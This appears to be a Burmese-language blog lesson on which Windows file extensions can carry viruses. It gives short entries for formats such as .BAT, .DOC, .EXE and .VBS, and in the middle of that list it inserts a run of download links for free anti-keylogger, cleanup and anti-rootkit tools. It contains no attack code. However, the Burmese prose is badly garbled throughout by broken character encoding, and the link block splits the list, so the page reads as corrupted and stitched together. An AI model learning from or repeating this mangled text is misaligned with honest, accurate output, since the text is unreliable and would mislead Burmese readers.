CleanUp! 4.5.2-------------------------------------Privacy Keyboard 9.2.1Heidi Eraser----------------------------------------Zemana Anti-LoggerDeFraggler------------------------------------------Advanced Anti Keylogger 3.6Autoruns--------------------------------------------Anti-Keylogger 9.2.1CCleaner------------------------------------------- Data Guard 2009 UltimateO&O Defrag 2000 Freeware-------------------Elite Anti-Keylogger 3.0Abexo Free Registry Cleaner 1---------------FireLion Anti-Keyloggers 2.0PC Inspector File RecoveryProcess ExplorerRecuva 1.01.069 BetaTweak UIUnlocker 1.8.5Tiny WatcherAdvanced SystemCare FreeATF Cleaner 3.0.0.2

၂။ အ%�Nရ�ယသ8&�%��ငး�ေ�သ� file extension မား��

Virus မ၀ငးအေ��ငး ကာ�တြကာယဆ ခငး� post ထ�မ�� *rရာေ�ယဆT��*��ငတငး.�႔ file extension �နည�ငးယဆ� �� အေဖ� ပခ�႔ပ#�ယဆ။ ��ဒ�ထ�မ�� လ��ပ��ကာT��အေန��႔ file type အေတြ�ကာ�� ဒ�မ�� ဆကာ9 ကာအေဖ� အေပပ�လ��ကာ"#�ယဆ။

.386

Windows Enhanced Mode Driver ဖစပါ"#�ယဆ။ device driver ဟာ� executable code ဖစပါ.�႔�တြ�ကာ virus ကာ%�စပါကာ*��

ငး"#�ယဆ။ ဒ#အေၾကာ�ငး� scan ဖ�8 ငး�"#�ယဆ။

.ADE

Microsoft Access Project Extension ဖစပါ"#�ယဆ။ macro virus အေတြ�ကာ ၄ငး�ရာေ�႕ ��နည�ခ�ကာအေတြ�ကာ�� သ6��ခ�*��ငး"#

�ယဆ။

.ADP

Microsoft Access Project ဖစပါ"#�ယဆ။ ဒ� extension ကာ��လည� macros အေတြ�ကာ �သ6��ခ�*��ငး"#�ယဆ။

http://www.notebookofstarryprince.co.cc/2009/12/virus_12.html

http://majorgeeks.com/ATF_Cleaner_d4949.html

http://www.iobit.com/advancedwindowscareper.html

http://kubicle.dcmembers.com/watcher/download.html

http://www.softpedia.com/get/System/System-Miscellaneous/Unlocker.shtml

http://www.snapfiles.com/get/tweakuixp.html

http://www.softpedia.com/get/System/Back-Up-and-Recovery/Recuva.shtml

http://www.softpedia.com/get/System/System-Info/Process-Explorer.shtml

http://www.snapfiles.com/get/pcinspector.html

http://www.brothersoft.com/firelion-anti-keyloggers-download-69719.html

http://download.cnet.com/Abexo-Free-Registry-Cleaner/3000-2094_4-10434887.html?tag=lst-0-1

http://download.cnet.com/Elite-Anti-Keylogger/3000-8022_4-10609198.html

http://www.majorgeeks.com/O&O_Defrag_2000_Freeware_Edition_d4545.html

http://wareseeker.com/download/dataguard-antikeylogger-ultimate-2009.rar/7d35d32cd

http://www.ccleaner.com/

http://download.cnet.com/Anti-keylogger/3000-8022_4-23735.html

http://www.snapfiles.com/reviews/AutoRuns/autoruns.html

http://www.anti-keylogger.net/advanced-anti-keylogger.zip

http://www.piriform.com/defraggler

http://www.tucows.com/preview/519360

http://eraser.heidi.ie/download.php

http://www.softpedia.com/get/Security/Keylogger-Monitoring/PrivacyKeyboard.shtml

http://www.stevengould.org/index.php?option=com_content&task=view&id=29&Itemid=70

http://www.pcdecrapifier.com/download

http://www.diamondcs.com.au/freeutilities/regprot.php

http://www.fileboost.net/directory/utilities/miscellaneous/najitool_gui/020783/review.html

http://www.kruptos2.co.uk/

http://www.resplendence.com/hookanalyzer

http://www.softpedia.com/get/Security/Encrypting/Steganos-LockNote.shtml

http://www.greatis.com/unhackme/download.htm

http://www.cypherix.com/cryptainerle/

http://research.pandasoftware.com/blogs/images/AntiRootkit.zip

http://www.snapfiles.com/get/TrueCrypt.html

http://www.threatfire.com/

http://www.winguardpro.com/products.html

http://www.sophos.com/products/free-tools/sophos-anti-rootkit.html

http://passwordsafe.sourceforge.net/

http://technet.microsoft.com/en-us/sysinternals/bb897445.aspx

.APP

Application File ဖစပါ"#�ယဆ။ program �မ��A�မ�� A�န�႔ ဆကာNပအေန��႔ extension ဖစပါ"#�ယဆ။ standalone program မ��န�႔

ဆငး.ငတOအေ��ငး ပAလ�ပ*��ငး ပ�� database program မ��ကာ�� န ႔ ပန *��ငး"#�ယဆ။

.ASP

Active Server Page ဖစပါ"#�ယဆ။ programအေတြ�၊ HTML code အေတြ�န�႔ အေပ#ငး�စပါပc�� ဖစပါ"#�ယဆ။

.BAS

Microsoft Visual Basic Class Module ဖစပါ"#�ယဆ။ ၄ငး��႔ဟာ� programအေတြ� ဖစပါ"#�ယဆ။

.BAT

Batch File အေတြ� ဖစပါ"#�ယဆ။ ၄ငး��႔ဟာ� system command အေတြ�ပ#၀ငး.�႔ text fileအေတြ� ဖစပါFကာပ#�ယဆ။ ၄ငး�

��႔ထ�ကာ �ခ��A႕ဟာ� batch file virusအေတြ� ဖစပါ*��ငး"#�ယဆ ... ဒ#အေပမယဆ� �ကာ�=နတးျ96��အေ�� မဟာ��"#ဘး%�။

.BIN

Binary File ဖစပါ"#�ယဆ။ task �မ��A��မ��A��တြ�ကာ သ6�� ပAနတးျ��ငး ပ�� မ�� ဖငး� program �စပါ��န�႔ ဆကာNပအေန��"#�

ယဆ။ ထပ9yမ�ထ��႔ ဖ��ငတငး.,စပါ��န�႔ �% ပ�� virus ကာ%�စပါကာU��႔ ဖစပါ*��ငးအေ ခရာေ��ပ#�ယဆ။ ဒ#အေပမယဆ� � မ��မ�အေ�� မဟာ��"#ဘး%�။

.BTM

4DOS Batch To Memory Batch File ဖစပါ"#�ယဆ။ Virus ပ#၀ငး.�႔ Batch file ဖစပါ*��ငး"#�ယဆ။

.CBT

Computer Based Training ပ#။ ၄ငး�ကာ�� clear ဖစပါအေ��ငး မလ�ပ*��ငး"#ဘး%�။ ၄ငး� ကာလည� virus ကာ%�စပါကာ*��ငတငး.�႔

extension �စပါ�� ဖစပါ"#�ယဆ။ ဒ#အေပမယဆ� ၄ငး��႔ရာေ�႕ default list ထ�မ�� Symantec ပ#၀ငး"#�ယဆ။

.CHM

Compiled HTML Help File ဖစပါ"#�ယဆ။ scripအေတြ�န�႔ ၄ငး�ရာေ�႕ ��နည�ခ�ကာ� �� သ6��ခ�*��ငး"#�ယဆ။

.CLA

.CLASS

Java Class File ဖစပါ"#�ယဆ။ sandbox �စပါ��ထ�အေကာန run ဖ��႔�တြ�ကာ suppose လ�ပ*��ငတငး.�႔ Java applet အေတြ� ဖစပါ ပ��

system အေကာနဖြခ�ထ��c ��ပ#�ယဆ။ sandbox ကာ secure ကာ��ထည�:+8ငး�တြ�ကာ��ကာ*��ငတငး.�႔ mode �စပါ��ထ�မ�� run အေန��႔ applet

�စပါ��ထ�ကာ�� ပရာေ�ယဆ�ယဆ( ငးU��႔�တြ�ကာ user အေတြ�ကာ ပAလ�ပ*��ငး"#�ယဆ။ဒ#အေၾကာ�ငး� Class file အေတြ�ကာ�� scan ဖ�8 ငး�"#�ယဆ။

.CMD

Window NT Command Script ဖစပါ"#�ယဆ။ NT �တြ�ကာ batch file �စပါ�� ဖစပါ"#�ယဆ။

.COM

Command(Executable File) ဖစပါ"#�ယဆ။ ဘးယဆexecutable file မဆ�� နည�လမ��မ��A�မ�� A�န�႔ virus ပ#၀ငးအေန*��ငး"#�ယဆ။

.CPL

Control Panel Extension ဖစပါ"#�ယဆ။ executable code အေတြ�ပ#၀ငး.�႔ device driver �စပါ��န�႔ ဆငး.ငတO ပ�� virus ပ#၀ငးအေ

န*��ငတငး.�႔�တြ�ကာ scan ဖ�8 ငး�"#�ယဆ။

.CRT

Security Certificate ဖစပါ"#�ယဆ။ ၄ငး�န�႔��% virus code အေတြ� အေပ#ငး�စပါပ"#၀ငး*��ငး"#�ယဆ။

.CSC

Corel Script File ဖစပါ"#�ယဆ။ executable ဖစပါ.�႔ script file ရာေ�႕ type �စပါ�� ဖစပါ"#�ယဆ။ virus scan ဖ�8 ငး�"#�ယဆ။

.CSS

Hypertext Cascading Style Sheet ဖစပါ"#�ယဆ။ Style Sheet အေတြ�ထ�မ�� Virus code အေတြ�ပ#၀ငး*��ငး"#�ယဆ။

.DLL

Dynamic Link Library ဖစပါ"#�ယဆ။ လ�ပdန ��၀နတးျEမ�� A�မ�� A�ကာ�� လ�ပအေဆ�ငး*��ငး ပ�� program �စပါ��န�႔ ဆကာNပအေန��"#�

ယဆ။�မ�� ဖငး�အေ�� DLL အေတြ�ဟာ� function အေတြ�ကာ�� programအေတြ�ဆ�သ��႔ အေပ#ငး�ထည�အေပ�� ဖစပါ"#�ယဆ။�

ခ��A႕အေကာ�� executable code အေတြ�ပ#၀ငးအေနတးျKပ�� မ��အေသ�� ဖငး� functionအေတြ� (သ��႔) data အေတြ� ရ�� ရ�� ရာေ�ငး�ရာေ�ငး�ပ�

ပ#၀ငး"#�ယဆ။ ဒ#အေပမယဆ� virus ပ# မပ#ဆ��ကာ�� မသ�*��ငတငး.�႔�တြ�ကာ scan ဖ�8 ငး�"#�ယဆ။

.DOC

MS Word Document ဖစပါ"#�ယဆ။ Word document အေတြ�ထ�မ�� macro virusအေတြ�ပ#၀ငးအေန*��ငး ပ�� virus အေတြ�န�႔

wormအေတြ��တြ�ကာ � ပည�+E၀ �သ6��ခ�*��ငး"#�ယဆ။

.DOT

MS Word Document Template ဖစပါ"#�ယဆ။ Word Tamplateအေတြ�ထ�မ��လည� macro virus အေတြ� ပ#၀ငး*��ငး ပ��

virus န�႔ worm အေတြ��တြ�ကာ � ပည�+E၀ �သ6��ခ�*��ငး"#�ယဆ။

.DRV

Device Driver ဖစပါ"#�ယဆ။ device driver �စပါ��ဟာ� executable code ဖစပါ"#�ယဆ။ဒ#အေၾကာ�ငး� virus ပ#၀ငးအေန*��ငး ပ��

scan ဖ�8 ငး�"#�ယဆ။

.EML

.EMAIL

MS Outlook Express E-mail ဖစပါ"#�ယဆ။ E-mail message အေတြ�မ�� HTML န�႔ script အေတြ�ပ#၀ငး*��ငး"#�ယဆ။ virus န�႔

worms �မ��စပါ�ကာ ဒ��နည�ခ�ကာ� �� သ6��ခ�ၾကာပ#�ယဆ။

.EXE

Executable File ဖစပါ"#�ယဆ။ ဘးယဆexecutable file မဆ�� နည�လမ��မ��A�မ�� A�န�႔ virus အေတြ�ပ#၀ငး*��ငး"#�ယဆ။

.FON

Font ဖစပါ"#�ယဆ။ ယဆ6�လ��႔လည� ရာေ�ယဆ မယဆ6�လ��႔လည� ရာေ��႔ extension �စပါ�� ဖစပါ"#�ယဆ။ font file �စပါ��ထ�မ��

executable code အေတြ�ရာေ��အေန*��ငတငး.�႔�တြ�ကာ virus ပ#၀ငး*��ငး"#�ယဆ။

.HLP

Help File ဖစပါ"#�ယဆ။ Help File အေတြ�ထ�မ�� macro virus အေတြ�ပ#၀ငး*��ငး"#�ယဆ။ ၄ငး��႔ကာ �မ�� ဖငး�အေ��

virus မပ# ပ#ဘး%�။ ဒ#အေပမယဆ� Trojan �စပါ��၊ *�စပါ��အေ�� ထည�+c��*��ငး"#�ယဆ။

.HTA

HTML Program ပ#။ scriptအေတြ� ပ#၀ငး*��ငး"#�ယဆ။

.HTM

.HTML

Hypertext Markeup Language ဖစပါ"#�ယဆ။ HTML file အေတြ�ဟာ� ပ��ပ�� ပ�� virus သယဆအေဆ�ငး.�႔ script အေတြ� ပ#၀ငး*��

ငး"# ပ�။

.INF

Setup Information ပ#။ Setup scriptအေတြ�ဟာ� အေမ��9ငး��ထ��႔ �ရာေ�အေတြ�ကာ�� ပAလ�ပU��႔�တြ�ကာ အေ ပ�ငး�လ�*��+ငးFကာ

ပ#�ယဆ။

.INI

Initialization File ဖစပါ"#�ယဆ။ program option အေတြ�ပ#၀ငး ပ#�ယဆ။

.INS

Internet Naming Service ဖစပါ"#�ယဆ။ အေမ��9ငး��ထ��႔ အေနရာေ�ကာ�� ညyန � အေပပ�ဖ��႔ အေ ပ�ငး�လ�*��+ငးFကာပ#�ယဆ။

.ISP

Internet Communication Setting အေတြ� ဖစပါ"#�ယဆ။ အေမ��9ငး��ထ��႔ �ရာေ�အေတြ�ကာ�� ညyန ပဖ��႔�တြ�ကာ အေ ပ�ငး�

လ�*��+ငးFကာပ#�ယဆ။

.JS

.JSE

JavaScript ဖစပါ"#�ယဆ။ script fileအေတြ�ဟာ� virus ပ#၀ငး.�႔ file အေတြ� ဖစပါ9�ၾကာပ# ပ�။ ဒ#အေၾကာ�ငး� အေ�ကာ�ငး�ဆ6��အေကာ

�� ၄ငး��႔ကာ�� scan ဖ�8 ငး�"#�ယဆ။ (.JSE ဟာ� encode ဖစပါ"#�ယဆ။ ဒ#အေၾကာ�ငး� �စပါ��မ��c ��ရာေမ��ကာ ၄ငး��႔ဟာ� � ခ��

�ရာေ�အေတြ�၊ Random၊ Extensionအေတြ� ပ#၀ငးအေန*��ငတငး.ယဆ ဆ��ပ#ပ�။)

.LIB

Library ဖစပါ"#�ယဆ။ သ��ရာေ��အေရာေ�� ၄ငး� file အေတြ�ဟာ�လည� virus ပ#၀ငး*��ငး"#�ယဆ။ ဒ#အေပမယဆ� �ခ�ထ�အေ�� LIB-

File virus အေတြ�ကာ�� အေဖ� အေပပ�*��ငး ခငး� မရာေ��အေသ�ပ#ဘး%�။

.LNK

Link ဖစပါ"#�ယဆ။ အေမ��9ငး��ထ��႔ အေနရာေ�အေတြ�ကာ�� ညyန ပဖ��႔�တြ�ကာ အေ ပ�ငး�လ�*��ငး"#�ယဆ။

.MDB

MS Access Database (သ��႔) MS Access Application ဖစပါ"#�ယဆ။ Access fileအေတြ�မ�� macro virusအေတြ� ပ#၀ငးအေန*��

ငး ပ�� virus အေတြ�၊ wormအေတြ�ကာ ၄ငး�ကာ�� ပည�+E၀ �သ6��ခ�*��+ငးFကာပ#�ယဆ။

.MDE

Microsoft Access MDE database ဖစပါ"#�ယဆ။ macro အေတြ�၊ scriptအေတြ�ကာ ၄ငး�ရာေ�႕ ��နည�ခ�ကာ� �� သ6��ခ�*��ငး"#�

ယဆ။

.MHT

.MHTM

.MHTML

MHTML Document ဖစပါ"#�ယဆ။ ၄ငး��႔ကာ Web page ကာ��သ�မ�ဆည�+.�႔ဟာ� ဖစပါ"#�ယဆ။ ၄ငး��႔မ�� scriptအေတြ�

ပ#၀ငး*��ငး ပ�� virus ကာ%�စပါကာ*��ငး"#�ယဆ။

.MP3

MP3 Program ဖစပါ"#�ယဆ။�မ�+နတးျ.ကာယဆ music file အေတြ�ကာ virus မကာ%�စပါကာ*��ငး"#ဘး%�...ဒ#အေပမယဆ� .mp3 extensionအေတြ�

န�႔ ��%ပ#��႔ fileအေတြ�မ�� Windows (သ��႔) RealNetwork media playerအေတြ�ကာ �ဓ�ပၸာ�ယဆအေကာ�ကာ� O ပ�� run *��ငး

��႔ macro code အေတြ�ပ#၀ငးအေန*��ငး"#�ယဆ။ ဒ#အေၾကာ�ငး� �မ�+နတးျ.ကာယဆ music file ရာေ�႕ �တြလနတးျ�� ကာ�ယဆ ပန ႔မ;အေတြ�ရာေ��ပ#�

ယဆ။

.MSO

Math Script Object ဖစပါ"#�ယဆ။ Symantec �အေရာေ�� ၄ငး��႔ဟာ� database-related program file အေတြ� ဖစပါ"#�ယဆ။

.MSC

Microsoft Common Console Document အေတြ� ဖစပါ"#�ယဆ။ အေမ��9ငး��ထ��႔ အေနရာေ�ကာ�� ညyန အေပပ�ဖ��႔�တြ�ကာ အေ

ပ�ငး�လ�အေပ�*��+ငးFကာပ#�ယဆ။

.MSI

Microsoft Windows Installer Package ဖစပါ"#�ယဆ။ Virus code အေတြ� ပ#၀ငး*��ငး"#�ယဆ။

.MSP

Microsoft Windows Installer Patch ဖစပါ ပ�� virus code အေတြ�ပ#၀ငး*��ငး"#�ယဆ။

.MST

Microsoft Visual Test Source File ဖစပါ"#�ယဆ။ Source အေအေတြ� ပ�ငး�လ�*��ငး"#�ယဆ။

.OBJ

Relocatable Object Code ဖစပါ"#�ယဆ။ ၄ငး� fileအေတြ�ဟာ� programအေတြ�န�႔ ဆကာNပအေနပ#�ယဆ။

.OCX

Object Linking န�႔ Embedding (OLE) Control Extension ဖစပါ"#�ယဆ။Web page �စပါ��အေကာန download ပAလ�ပ*��ငး

��႔ program �စပါ�� ဖစပါ"#�ယဆ။

.OV?

Program File Overlay ဖစပါ"#�ယဆ။ progarm �စပါ��န�႔��% လ�ပdန ��၀နတးျEမ�� A�မ�� A�ကာ�� ပAလ�ပU��႔�သ6�� ပA*��ငး"#�ယဆ။ အေယဆ

ဘး%ယဆ�� ဖငး�အေ�� Overlayအေတြ�ဟာ� functionအေတြ�ကာ�� programအေတြ�ဆ�သ��႔ အေပ#ငး�ထည�အေပ�ဖ��႔ ဖစပါ"#�ယဆ။

Overlay fileအေတြ�မ�� virus ပ#၀ငးအေန*��ငး"#�ယဆ။ ဒ#အေပမယဆ�+Eမ�� ဖငး�အေ�� မပ# ပ#ဘး%�။

.PCD

Photo CD MS Compiled Script ဖစပါ"#�ယဆ။ Scriptအေတြ�ဟာ� ��နည�ခ�ကာအေတြ� ဖစပါ"#�ယဆ။

.PGM

Program File ဖစပါ"#�ယဆ။ program �မ��A��မ��A�န�႔ ဆကာNပအေနပ#�ယဆ။ standalone program မ��န�႔ ဆငး.ငတOအေ��ငး ပAလ�

ပ*��ငး ပ�� database program မ��ကာ�� န ႔ ပန *��ငး"#�ယဆ။

.PIF

MS-DOS Shortcut ဖစပါ"#�ယဆ။ ၄ငး�ကာ�� အေ ပ�ငး�လ�လ��ကာ�ယဆ( ��ရာေငးအေ�� အေမ��9ငး��ထ��႔ programအေတြ� � ဖစပါ run

*��ငး"#�ယဆ။

.PPT

MS PowerPoint Presentation ဖစပါ"#�ယဆ။ ၄ငး�ထ�မ�� macro virus အေတြ�ပ#၀ငးအေန*��ငး ပ�� virus အေတြ�၊ warmအေတြ�ကာ

၄ငး�ကာ�� ပည�+E၀ �သ6��ခ�*��+ငးFကာပ#�ယဆ။

.PRC

Palmpilot Resource File ဖစပါ"#�ယဆ။ PDA program �စပါ�� ဖစပါ ပ�� ရာေ��ရာေ��ပ# PDA virus အေတြ�ရာေ��အေန*��ငး"#�ယဆ။

.REG

Registry Entryအေတြ� ဖစပါ ပ�� ၄ငး�ကာ�� run လ��ကာ�ယဆ( ��ရာေငး Registry ကာ�� အေ ပ�ငး�လ�*��ငး"#�ယဆ။

.RTF

Rich Text Format ဖစပါ"#�ယဆ။ text အေတြ�ကာ�� format ပAလ�ပ အေရာေy႕အေ႕ ပ�ငး�အေပ�ဖ��႔�တြ�ကာ format �စပါ�� ဖစပါ ပ��

�မ�� ဖငး�အေ�� ယဆ6�ၾကာည*��ငး"#�ယဆ။ virus ပ#၀ငး.�႔ Binary object အေတြ�ဟာ� RTF file အေတြ�ၾကာ��ထ�မ�� နစပါ မA

ပအေန*��ငး"#�ယဆ။ ဒ#အေၾကာ�ငး� လ6� ခ6Aစပါ��ရာေဖ��႔�တြ�ကာ scan ဖ�8 ငး�+.�႔�ထ�မ�� ပ# ပ#�ယဆ။RTF ဖ��ငးအေတြ�ဟာ� DOC file

အေတြ�ကာ�� rename အေပ�*��ငး ပ�� Word ကာ ၄ငး��႔ကာ�� DOC fileအေတြ�ကာ�႔သ��႔ :ဖငး�"#�ယဆ။

.SCR

Screen Saver (သ��႔) Script ဖစပါ"#�ယဆ။ Screen Saverအေတြ�န�႔ Scriptအေတြ� *�စပါ��စပါလ6��ကာ executable code အေ

တြ� ဖစပါ"#�ယဆ။ ဒ#အေၾကာ�ငး� virus အေတြ�ပ#၀ငးအေန*��ငတငး8လ�� warm (သ��႔) Trojan အေတြ�ထည�+c��*��ငး"#�ယဆ။

.SCT

Windows Script Component ဖစပါ"#�ယဆ။ Scriptအေတြ�ဟာ� virus ကာ%�စပါကာ*��ငး"#�ယဆ။

.SHB

.SHS

Shell Scrap Object File ဖစပါ"#�ယဆ။ scrap file �စပါ��မ�� ရ�� စပါငး��႔ text file အေကာန :စပါမ�� ပည�၀��႔ executable

file အေတြ��ထ�ပ#၀ငး*��ငး"#�ယဆ။� ခ��စပါအေယဆ�အေကာ� နသငး�+(�ကာ�� အေပ�ပ��႔ခ��မယဆ( ��ရာေငး �မ�� ဖငး�အေ�� ၄ငး��႔ကာ�� အေ

ရာေ��ငးT��သငး�"#�ယဆ။ ဒ#အေပမယဆ� ပ6�မ�+နတးျE�� ဖငး�အေ�� single systemအေအေတြ�ပၚမ�� operation system �� ဖငး� �

သ6�� ပAၾကာပ#�ယဆ။

.SMM

Ami Pro Macro Rare ဖစပါ ပ�� virus ကာ%�စပါကာ*��ငး"#�ယဆ။

Source

Source Code အေတြ� ဖစပါ"#�ယဆ။ program file အေတြ�ရာေ��ၾကာ ပ�� source code virus �� ဖငး� virus ကာ%�စပါကာ*��ငး"#�ယဆ။

(ဒ�လ��ကာ%�စပါကာ. ယဆ( �� ရာေ��အေ�� ရာေ��ပ#�ယဆ။) သငးX� programmer �စပါအေယဆ�ကာ မဟာ��႔ဘး%�ဆ��ရာေငးအေ��ငး�� စပါ��ရာေ�မNရာေ�အေ�� မ

လ��ပ#ဘး%�။ Extensionအေတြ�ပ#၀ငး ပ�� .ASM, .C , .CPP, .PAS, .BAS, .FOR ပ� ဖစပါTမယဆ9 ��အေ႔�� ကာန ႔သ��ကာ�ရာေ��ပ#ဘး%�။

.SYS

System Device Driver ဖစပါ"#�ယဆ။ device driver ဟာ� executable code ဖစပါ.�႔�တြ�ကာ virus ကာ%�စပါကာ*��ငး"#�

ယဆ...ဒ#အေၾကာ�ငး� scan ဖ�8 ငး�"#�ယဆ။

.URL

Internet Shortcut ဖစပါ"#�ယဆ။မလ��လ��ပ.�႔ Web location အေတြ�ဆ�သ��႔ သငး�+��,� ပ��အေ႔ဆ�ငးအေပ�*��ငး"#�ယဆ။

.VB

.VBE

VBScript File ဖစပါ"#�ယဆ။ ဒ� Scriptအေတြ�ဟာ� virus ကာ%�စပါကာ*��ငး"#�ယဆ။(.VBE ဟာ� encode ဖစပါ"#�ယဆ။)

.VBS

Visual Basic Script ဖစပါ"#�ယဆ။ ဒ� script file အေတြ�မ�� virus ပ#၀ငး*��ငတငး8လ�� warm (သ��႔) Trojan �စပါ��ကာ��လည� ထ

ည�+c��*��ငး"#�ယဆ။

.VXD

Virtual Device Driver ဖစပါ"#�ယဆ။ executable code အေတြ� ဖစပါ.�႔�တြ�ကာ virus ကာ%�စပါကာ*��ငး"#�ယဆ...scan ဖ�"#။

.WSC

Windows Script Component ဖစပါ"#�ယဆ။ Scriptအေတြ�ဟာ� virus ကာ%�စပါကာ*��ငး"#�ယဆ။

.WSF

Windows Script File ဖစပါ ပ�� virus ကာ%�စပါကာ*��ငး"#�ယဆ။

.WSH

Windows Script Host Settings File ဖစပါ"#�ယဆ။ Settingအေတြ�ဟာ� အေမ��9ငး��ထ��အေတြ�ကာ�� ပAလ�ပU��႔�တြ�ကာ အေ ပ�

ငး�လ�*��+ငးFကာပ#�ယဆ။

.XL?

MS Excel File ဖစပါ"#�ယဆ။ Excel Worksheet အေတြ�မ�� macro virus အေတြ�ပ#၀ငးအေန*��ငး ပ�� virus န�႔ wormအေတြ�ကာ

၄ငး��႔ကာ�� ပည�+E၀�သ6�� ပA*��+ငးFကာပ#�ယဆ။

Documents

Virus Intro Lessons